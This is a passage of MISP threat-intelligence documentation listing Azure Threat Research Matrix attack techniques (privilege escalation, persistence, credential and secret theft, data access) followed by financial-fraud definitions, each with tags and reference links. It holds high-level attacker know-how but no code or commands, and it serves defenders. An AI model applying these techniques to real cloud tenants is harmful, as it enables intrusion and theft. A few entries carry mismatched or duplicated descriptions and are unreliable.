https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT303/AZT303

AZT401 - Privileged Identity Management Role

An adversary may escalate their privileges if their current account is eligible for role activation via Privileged Identity Management (PIM).

The tag is: misp-galaxy:atrm="AZT401 - Privileged Identity Management Role"

Table 506. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT401/AZT401

AZT402 - Elevated Access Toggle

An adversary may escalate their privileges from Azure AD to all Azure subscriptions in the tenant if they are a global administrator

The tag is: misp-galaxy:atrm="AZT402 - Elevated Access Toggle"

Table 507. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT402/AZT402

AZT403 - Local Resource Hijack

By modifying the .bashrc file in a CloudShell .IMG file, an adversary may escalate their privileges by injecting commands that will add an arbitrary user account to a desired role and scope.

The tag is: misp-galaxy:atrm="AZT403 - Local Resource Hijack"

Table 508. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT403/AZT403-1

AZT404 - Principal Impersonation

Adversaries may abuse resources that are configured with a service principal or other identity to further their access to the current or other resources.

The tag is: misp-galaxy:atrm="AZT404 - Principal Impersonation"

Table 509. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404

AZT404.1 - Function Application

By utilizing a Function Application configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.1 - Function Application"

Table 510. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-1

AZT404.2 - Logic Application

By utilizing a Logic Application configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.2 - Logic Application"

Table 511. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-2

AZT404.3 - Automation Account

By utilizing a Function Application, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.3 - Automation Account"

Table 512. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-3

AZT404.4 - App Service

By utilizing an App Service configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.4 - App Service"

Table 513. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-4

AZT405 - Azure AD Application

Adversaries may abuse the assigned permissions on an Azure AD Application to escalate their privileges.

The tag is: misp-galaxy:atrm="AZT405 - Azure AD Application"

Table 514. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405

AZT405.1 - Application API Permissions

By compromising a user, user in a group, or service principal that has an application role over an application, they may be able to escalate their privileges by impersonating the associated service principal and leveraging any privileged assigned application role.

The tag is: misp-galaxy:atrm="AZT405.1 - Application API Permissions"

Table 515. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-1

AZT405.2 - Application Role

By compromising a service principal whose application has privileged API permissions, an attacker can escalate their privileges to a higher privileged role.

The tag is: misp-galaxy:atrm="AZT405.2 - Application Role"

Table 516. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-2

AZT405.3 - Application Registration Owner

By compromising an account who is an 'Owner' over an application that is configured with additional roles or API permissions, an attacker can escalate their privileges by adding a certificate or credentials & logging in as the service principal.

The tag is: misp-galaxy:atrm="AZT405.3 - Application Registration Owner"

Table 517. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-3

AZT501 - Account Manipulation

An adverary may manipulate an account to maintain access in an Azure tenant

The tag is: misp-galaxy:atrm="AZT501 - Account Manipulation"

Table 518. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501

AZT501.1 - User Account Manipulation

An adverary may manipulate a user account to maintain access in an Azure tenant

The tag is: misp-galaxy:atrm="AZT501.1 - User Account Manipulation"

Table 519. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-1

AZT501.2 - Service Principal Manipulation

An adverary may manipulate a service principal to maintain access in an Azure tenant

The tag is: misp-galaxy:atrm="AZT501.2 - Service Principal Manipulation"

Table 520. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-2

AZT501.3 - Azure VM Local Administrator Manipulation

An adverary may manipulate the local admin account on an Azure VM

The tag is: misp-galaxy:atrm="AZT501.3 - Azure VM Local Administrator Manipulation"

Table 521. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-3

AZT502 - Account Creation

An adversary may create an account in Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT502 - Account Creation"

Table 522. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502

AZT502.1 - User Account Creation

An adversary may create an application & service principal in Azure Active Directory

The tag is: misp-galaxy:atrm="AZT502.1 - User Account Creation"

Table 523. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-1

AZT502.2 - Service Principal Creation

An adversary may create an application & service principal in Azure Active Directory

The tag is: misp-galaxy:atrm="AZT502.2 - Service Principal Creation"

Table 524. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-2

AZT502.3 - Guest Account Creation

An adversary may create a guest account in Azure Active Directory

The tag is: misp-galaxy:atrm="AZT502.3 - Guest Account Creation"

Table 525. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-3

AZT503 - HTTP Trigger

Adversaries may configure a resource with an HTTP trigger to run commands without needing authentication.

The tag is: misp-galaxy:atrm="AZT503 - HTTP Trigger"

Table 526. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503

AZT503.1 - Logic Application HTTP Trigger

Adversaries may configure a Logic Application with a user account or managed identity and modify the HTTP trigger to run a command via HTTP request.

The tag is: misp-galaxy:atrm="AZT503.1 - Logic Application HTTP Trigger"

Table 527. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-1

AZT503.2 - Function App HTTP Trigger

Adversaries may configure a Function Application with a user account or managed identity and modify the HTTP trigger to run a command via HTTP request.

The tag is: misp-galaxy:atrm="AZT503.2 - Function App HTTP Trigger"

Table 528. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-2

AZT503.3 - Runbook Webhook

Adversaries may create a webhook to a Runbook which allows unauthenticated access into an Azure subscription or tenant.

The tag is: misp-galaxy:atrm="AZT503.3 - Runbook Webhook"

Table 529. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-3

AZT503.4 - WebJob

Adversaries may create a WebJob on a App Service which allows arbitrary background tasks to be run on a set schedule

The tag is: misp-galaxy:atrm="AZT503.4 - WebJob"

Table 530. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-4

AZT504 - Watcher Tasks

By configurating a watcher task and a Runbook, an adversary can establish persistence by executing the Runbook on a triggered event.

The tag is: misp-galaxy:atrm="AZT504 - Watcher Tasks"

Table 531. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT504/AZT504

AZT505 - Scheduled Jobs

Adversaries may create a schedule for a Runbook to run at a defined interval.

The tag is: misp-galaxy:atrm="AZT505 - Scheduled Jobs"

Table 532. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT505/AZT505-1

AZT506 - Network Security Group Modification

Adversaries can modify the rules in a Network Security Group to establish access over additional ports.

The tag is: misp-galaxy:atrm="AZT506 - Network Security Group Modification"

Table 533. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT506/AZT506

AZT507 - External Entity Access

Adversaries may configure the target Azure tenant to be managed by another, externel tenant, or its users.

The tag is: misp-galaxy:atrm="AZT507 - External Entity Access"

Table 534. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507

AZT507.1 - Azure Lighthouse

Adversaries may utilize Azure Lighthouse to manage the target tenant from an external tenant

The tag is: misp-galaxy:atrm="AZT507.1 - Azure Lighthouse"

Table 535. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-1

AZT507.2 - Microsoft Partners

Adversaries may use Delegated Administrative Privileges to give themselves administrator access to the target tenant.

The tag is: misp-galaxy:atrm="AZT507.2 - Microsoft Partners"

Table 536. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-2

AZT507.3 - Subscription Hijack

An adversary may transfer a subscription from a target tenant to an attacker-controlled tenant. This retains the billing account setup by the target and the target tenant administrators will no longer have control over the subscription.

The tag is: misp-galaxy:atrm="AZT507.3 - Subscription Hijack"

Table 537. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-3

AZT507.4 - Domain Trust Modification

An adversary may add an additional identity provider or domain to maintain a backdoor into the tenant.

The tag is: misp-galaxy:atrm="AZT507.4 - Domain Trust Modification"

Table 538. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-4

AZT508 - Azure Policy

By configuring a policy with the 'DeployIfNotExists' definition, an adverary may establish persistence by creating a backdoor when the policy is triggered.

The tag is: misp-galaxy:atrm="AZT508 - Azure Policy"

Table 539. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT508/AZT508

AZT601 - Steal Managed Identity JsonWebToken

An adverary may utilize the resource’s functionality to obtain a JWT for the applied Managed Identity Service Principal account.

The tag is: misp-galaxy:atrm="AZT601 - Steal Managed Identity JsonWebToken"

Table 540. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601

AZT601.1 - Virtual Machine IMDS Request

By utilizing access to IMDS, an attacker can request a JWT for a Managed Identity on an Azure VM if they have access to execute commands on the system.

The tag is: misp-galaxy:atrm="AZT601.1 - Virtual Machine IMDS Request"

Table 541. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-1

AZT601.2 - Azure Kubernetes Service IMDS Request

By utilizing access to IMDS, an attacker can request a JWT for a Managed Identity on an AKS Cluster if they have access to execute commands on the system.

The tag is: misp-galaxy:atrm="AZT601.2 - Azure Kubernetes Service IMDS Request"

Table 542. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-2

AZT601.3 - Logic Application JWT PUT Request

If a Logic App is using a Managed Identity, an adversary can modify the logic to make an HTTP POST request to reveal the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.3 - Logic Application JWT PUT Request"

Table 543. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-3

AZT601.4 - Function Application JWT GET Request

If a Function App is using a Managed Identity, an adversary can modify the logic respond to an HTTP GET request to reveal the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.4 - Function Application JWT GET Request"

Table 544. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-4

AZT601.5 - Automation Account Runbook

If an Automation Account is using a Managed Identity, an adversary can create a Runbook to request the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.5 - Automation Account Runbook"

Table 545. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-5

AZT602 - Steal Service Principal Certificate

If a Runbook is utilizing a 'RunAs' account, then an adversary may manipulate the Runbook to reveal the certificate the Service Principal is using for authentication.

The tag is: misp-galaxy:atrm="AZT602 - Steal Service Principal Certificate"

Table 546. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT602/AZT602-1

AZT603 - Service Principal Secret Reveal

If a Function App is using a service principal for authentication, an adversary may manipulate the function app logic to reveal the service principal’s secret in plain text.

The tag is: misp-galaxy:atrm="AZT603 - Service Principal Secret Reveal"

Table 547. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT603/AZT603-1

AZT604 - Azure KeyVault Dumping

An adverary may access an Azure KeyVault in an attempt to view secrets, certificates, or keys.

The tag is: misp-galaxy:atrm="AZT604 - Azure KeyVault Dumping"

Table 548. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604

AZT604.1 - Azure KeyVault Secret Dump

By accessing an Azure Key Vault, an adversary may dump any or all secrets.

The tag is: misp-galaxy:atrm="AZT604.1 - Azure KeyVault Secret Dump"

Table 549. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-1

AZT604.2 - Azure KeyVault Certificate Dump

By accessing an Azure Key Vault, an adversary may dump any or all certificates.

The tag is: misp-galaxy:atrm="AZT604.2 - Azure KeyVault Certificate Dump"

Table 550. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-2

AZT604.3 - Azure KeyVault Key Dump

By accessing an Azure Key Vault, an adversary may dump any or all public keys. Note that Private keys cannot be retrieved.

The tag is: misp-galaxy:atrm="AZT604.3 - Azure KeyVault Key Dump"

Table 551. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-3

AZT605 - Resource Secret Reveal

An adverary may access an Azure KeyVault in an attempt to view secrets, certificates, or keys.

The tag is: misp-galaxy:atrm="AZT605 - Resource Secret Reveal"

Table 552. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605

AZT605.1 - Storage Account Access Key Dumping

By accessing a Storage Account, an adversary may dump access keys pertaining to the Storage Account, which will give them full access to the Storage Account.

The tag is: misp-galaxy:atrm="AZT605.1 - Storage Account Access Key Dumping"

Table 553. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-1

AZT605.2 - Automation Account Credential Secret Dump

By editing a Runbook, a credential configured in an Automation Account may be revealed

The tag is: misp-galaxy:atrm="AZT605.2 - Automation Account Credential Secret Dump"

Table 554. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-2

AZT605.3 - Resource Group Deployment History Secret Dump

By accessing deployment history of a Resource Group, secrets used in the ARM template may be revealed.

The tag is: misp-galaxy:atrm="AZT605.3 - Resource Group Deployment History Secret Dump"

Table 555. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-3

AZT701 - SAS URI Generation

By generating an SAS URI for a resource, an adversary may extract the contents of that resource without authentication at any time.

The tag is: misp-galaxy:atrm="AZT701 - SAS URI Generation"

Table 556. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701

AZT701.1 - VM Disk SAS URI

An adversary may create an SAS URI to download the disk attached to a virtual machine.

The tag is: misp-galaxy:atrm="AZT701.1 - VM Disk SAS URI"

Table 557. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701-1

AZT701.2 - Storage Account File Share SAS

By generating a Shared Access Signature (SAS) URI, an adversary can access a container in a Storage Account at any time.

The tag is: misp-galaxy:atrm="AZT701.2 - Storage Account File Share SAS"

Table 558. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701-2

AZT702 - File Share Mounting

An adversary can generate a connection string to mount an Azure Storage Account File Share as an NFS or SMB share to their local machine.

The tag is: misp-galaxy:atrm="AZT702 - File Share Mounting"

Table 559. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT702/AZT702-1

AZT703 - Replication

The tag is: misp-galaxy:atrm="AZT703 - Replication"

Table 560. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT703/AZT703-1

AZT704 - Soft-Delete Recovery

An adversary may leverage resources found at a 'soft deletion' state, restore them and advance their attack by retrieving contents meant to be deleted

The tag is: misp-galaxy:atrm="AZT704 - Soft-Delete Recovery"

Table 561. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704

AZT704.1 - Key Vault

An adversary may recover a key vault object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.1 - Key Vault"

Table 562. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-1

AZT704.2 - Storage Account Object

An adversary may recover a storage account object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.2 - Storage Account Object"

Table 563. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-2

AZT704.3 - Recovery Services Vault

An adversary may recover a virtual machine object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.3 - Recovery Services Vault"

Table 564. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-3

AZT705 - Azure Backup Delete

An adversary may recover a virtual machine object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT705 - Azure Backup Delete"

Table 565. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-3

attck4fraud

attck4fraud - Principles of MITRE ATT&CK in the fraud domain.

attck4fraud is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Francesco Bigarella - Christophe Vandeplas

Phishing

In the context of ATT&CK for Fraud, phishing is described as the sending of fraudulent emails to a large audience in order to obtain sensitive information (PII, credentials, payment information). Phishing is never targeted to a specific individual or organisation. Phishing tries to create a sense of urgency or curiosity in order to capture the victim.

The tag is: misp-galaxy:financial-fraud="Phishing"

Table 566. Table References

Links

https://blog.malwarebytes.com/cybercrime/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/

https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Spear phishing

Spear phishing is the use of targeted emails to gain the trust of the target with the goal of committing fraud. Spear phishing messages are generally specific to the target and show an understanding of the target’s organisation structure, supply chain or business.

The tag is: misp-galaxy:financial-fraud="Spear phishing"

Spear phishing is also known as:

  • Spear-phishing

Table 567. Table References

Links

http://fortune.com/2017/04/27/facebook-google-rimasauskas/

https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM skimming

ATM Skimming refers to the act of capturing the data stored on a bank cards (tracks) and the Personal Identification Number (PIN) associated to that card. Upon obtaining the data, the criminal proceeds to encode the same information into a new card and use it in combination with the PIN to perform illicit cash withdrawals. ATM Skimming is often achieved with a combination of a skimmer device for the card and a camera to capture the PIN.

The tag is: misp-galaxy:financial-fraud="ATM skimming"

ATM skimming is also known as:

  • Skimming - CPP ATM

Table 568. Table References

Links

https://krebsonsecurity.com/2015/07/spike-in-atm-skimming-in-mexico/

https://krebsonsecurity.com/2011/12/pro-grade-3d-printer-made-atm-skimmer/

https://krebsonsecurity.com/2017/08/dumping-data-from-deep-insert-skimmers/

https://krebsonsecurity.com/2016/06/atm-insert-skimmers-in-action/

https://krebsonsecurity.com/2014/11/skimmer-innovation-wiretapping-atms/

https://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/

https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green

https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM cash trapping

Trap the cash dispenser with a physical component. Type 1 are visible to the user and type 2 are hidden in the cash dispenser

The tag is: misp-galaxy:financial-fraud="ATM cash trapping"

ATM cash trapping is also known as:

  • Cash Trapping

Table 569. Table References

Links

https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM Shimming

ATM Shimming refers to the act of capturing a bank card data accessing the EMV chip installed on the card while presenting the card to a ATM. Due to their low profile, shimmers can be fit inside ATM card readers and are therefore more difficult to detect.

The tag is: misp-galaxy:financial-fraud="ATM Shimming"

Table 570. Table References

Links

https://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/

https://www.cbc.ca/news/canada/british-columbia/shimmers-criminal-chip-card-reader-fraud-1.3953438

https://krebsonsecurity.com/2017/01/atm-shimmers-target-chip-based-cards/

https://blog.dieboldnixdorf.com/atm-security-skimming-vs-shimming/

Vishing

Also known as voice phishing, is the criminal practice of using social engineering over the telephone system to gain access to private personal and financial information from the public for the purpose of financial reward. It is also employed by attackers for reconnaissance purposes to gather more detailed intelligence on a target organisation.

The tag is: misp-galaxy:financial-fraud="Vishing"

Table 571. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

POS Skimming

CPP analysis identifies the likely merchant, POS or ATM location from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.

The tag is: misp-galaxy:financial-fraud="POS Skimming"

POS Skimming is also known as:

  • Skimming - CPP POS

Table 572. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Social Media Scams

Social Media Scams

The tag is: misp-galaxy:financial-fraud="Social Media Scams"

Malware

Software which is specifically designed to disrupt, damage, or gain authorised access to a computer system.

The tag is: misp-galaxy:financial-fraud="Malware"

Table 573. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Account-Checking Services

Account-Checking Services

The tag is: misp-galaxy:financial-fraud="Account-Checking Services"

ATM Black Box Attack

Type of Jackpotting attack. Connection of an unauthorized device which sends dispense commands directly to the ATM cash dispenser in order to “cash out” the ATM.

The tag is: misp-galaxy:financial-fraud="ATM Black Box Attack"

ATM Black Box Attack is also known as:

  • Black Box Attack

Table 574. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Insider Trading

Insider Trading

The tag is: misp-galaxy:financial-fraud="Insider Trading"

Investment Fraud

A deceptive practice in the stock or commodities markets that induces investors to make purchase or sale decisions on the basis of false information, frequently resulting in losses, in violation of securities laws.

The tag is: misp-galaxy:financial-fraud="Investment Fraud"

Table 575. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Romance Scam

Romance scam is a confidence trick involving feigning romantic intentions towards a victim, gaining their affection, and then using that goodwill to commit fraud. Fraudulent acts may involve access to the victim’s money, bank accounts, credit cards, passports, e-mail accounts, or national identification numbers; or forcing the victims to commit financial fraud on their behalf.

The tag is: misp-galaxy:financial-fraud="Romance Scam"

Romance Scam is also known as:

  • Romance Fraud

Table 576. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Buying/Renting Fraud

Buying/Renting Fraud

The tag is: misp-galaxy:financial-fraud="Buying/Renting Fraud"

Cash Recovery Scam

Cash Recovery Scam

The tag is: misp-galaxy:financial-fraud="Cash Recovery Scam"

Fake Invoice Fraud

Invoice fraud happens when a company or organisation is tricked into changing bank account payee details for a payment. Criminals pose as regular suppliers to the company or organisation and will make a formal request for bank account details to be changed or emit false invoices.

The tag is: misp-galaxy:financial-fraud="Fake Invoice Fraud"

Fake Invoice Fraud is also known as:

  • Invoice Fraud

Table 577. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Business Email Compromise

Business Email Compromise

The tag is: misp-galaxy:financial-fraud="Business Email Compromise"

Scam

Scam

The tag is: misp-galaxy:financial-fraud="Scam"

CxO Fraud

CxO Fraud

The tag is: misp-galaxy:financial-fraud="CxO Fraud"

Compromised Payment Cards

The loss of or theft of a card, which is subsequently used for illegal purposes until blocked by the card issuer.

The tag is: misp-galaxy:financial-fraud="Compromised Payment Cards"

Compromised Payment Cards is also known as:

  • Lost/Stolen Card

Table 578. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Compromised Account Credentials

Account takeover fraud is a form of identity theft in which the fraudster gets access to a victim’s bank or credit card accounts — through a data breach, malware or phishing — and uses them to make unauthorised transaction.

The tag is: misp-galaxy:financial-fraud="Compromised Account Credentials"

Compromised Account Credentials is also known as:

  • Account Takeover Fraud

Table 579. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Compromised Personally Identifiable Information (PII)

Compromised Personally Identifiable Information (PII)

The tag is: misp-galaxy:financial-fraud="Compromised Personally Identifiable Information (PII)"

Compromised Intellectual Property (IP)

Compromised Intellectual Property (IP)

The tag is: misp-galaxy:financial-fraud="Compromised Intellectual Property (IP)"

SWIFT Transaction

SWIFT Transaction

The tag is: misp-galaxy:financial-fraud="SWIFT Transaction"

Fund Transfer

Fund Transfer

The tag is: misp-galaxy:financial-fraud="Fund Transfer"

Cryptocurrency Exchange

Cryptocurrency Exchange

The tag is: misp-galaxy:financial-fraud="Cryptocurrency Exchange"

ATM Jackpotting

ATM Jackpotting

The tag is: misp-galaxy:financial-fraud="ATM Jackpotting"

Money Mules

Money Mules

The tag is: misp-galaxy:financial-fraud="Money Mules"

Prepaid Cards

Prepaid Cards

The tag is: misp-galaxy:financial-fraud="Prepaid Cards"

Resell Stolen Data

Resell Stolen Data

The tag is: misp-galaxy:financial-fraud="Resell Stolen Data"

ATM Explosive Attack

ATM Explosive Attack

The tag is: misp-galaxy:financial-fraud="ATM Explosive Attack"

CNP – Card Not Present

A card not present transaction (CNP, MO/TO, Mail Order / Telephone Order, MOTOEC) is a payment card transaction made where the cardholder does not or cannot physically present the card for a merchant’s visual examination at the time that an order is given and payment effected

The tag is: misp-galaxy:financial-fraud="CNP – Card Not Present"

Table 580. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

CP – Card Present

A card present transaction occurs when a cardholder physically presents a card to request and authorise a financial transaction

The tag is: misp-galaxy:financial-fraud="CP – Card Present"

Table 581. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Merchant Fraud

Fraud that occurs when a merchant account is used without the intention of operating a legitimate business transaction.

The tag is: misp-galaxy:financial-fraud="Merchant Fraud"

Table 582. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Virtual Currency Fraud

Fraud that involves virtual currency, or virtual money, which is a type of unregulated, digital money, issued and usually controlled by its developers and used and accepted among the members of a specific virtual community.

The tag is: misp-galaxy:financial-fraud="Virtual Currency Fraud"

Table 583. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Cheque Fraud

A category of criminal acts that involve making the unlawful use of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or account-holder’s legal ownership. Most methods involve taking advantage the time between the negotiation of the cheque and its clearance at the cheque writer’s financial institution to draw out these funds.

The tag is: misp-galaxy:financial-fraud="Cheque Fraud"

Table 584. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Digital Fraud

Fraud perpetrated via omni- channel means to digital banking or payments channels such as home banking or other electronic services.

The tag is: misp-galaxy:financial-fraud="Digital Fraud"

Table 585. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Mobile Fraud

Fraud perpetrated via mobile devices to digital banking, payments channels such as home banking or other electronic services, or online merchants

The tag is: misp-galaxy:financial-fraud="Mobile Fraud"

Table 586. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Telephone Fraud

Fraud perpetrated via land line telephone means to banking or payments channels such as home banking or other electronic services or merchants

The tag is: misp-galaxy:financial-fraud="Telephone Fraud"

Table 587. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Standing Order Fraud

Fraud occurs when a standing order is falsely created or adulterated. A standing order is an automated method of making payments, where a person or business instructs their bank to pay another person or business, a fixed amount of money at regular intervals. Fraud occurs when a standing order is falsely created or adulterated.

The tag is: misp-galaxy:financial-fraud="Standing Order Fraud"

Table 588. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

CEO/BEC Fraud

A scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential information

The tag is: misp-galaxy:financial-fraud="CEO/BEC Fraud"

Table 589. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Money laundering

An illegal process of concealing the origins of money obtained illegally by passing it through a complex sequence of banking transfers or commercial transactions. The overall scheme of this process returns the money to the launderer in an obscure and indirect way.

The tag is: misp-galaxy:financial-fraud="Money laundering"

Table 590. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

BIN Attack

Credit cards are produced in BIN ranges. Where an issuer does not use random generation of the card number, it is possible for an attacker to obtain one good card number and generate valid card numbers

The tag is: misp-galaxy:financial-fraud="BIN Attack"

Table 591. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

DoS - Denial of Service Attack

In computing, a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet

The tag is: misp-galaxy:financial-fraud="DoS - Denial of Service Attack"

Table 592. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

MITM - Man-in-the-Middle Attack

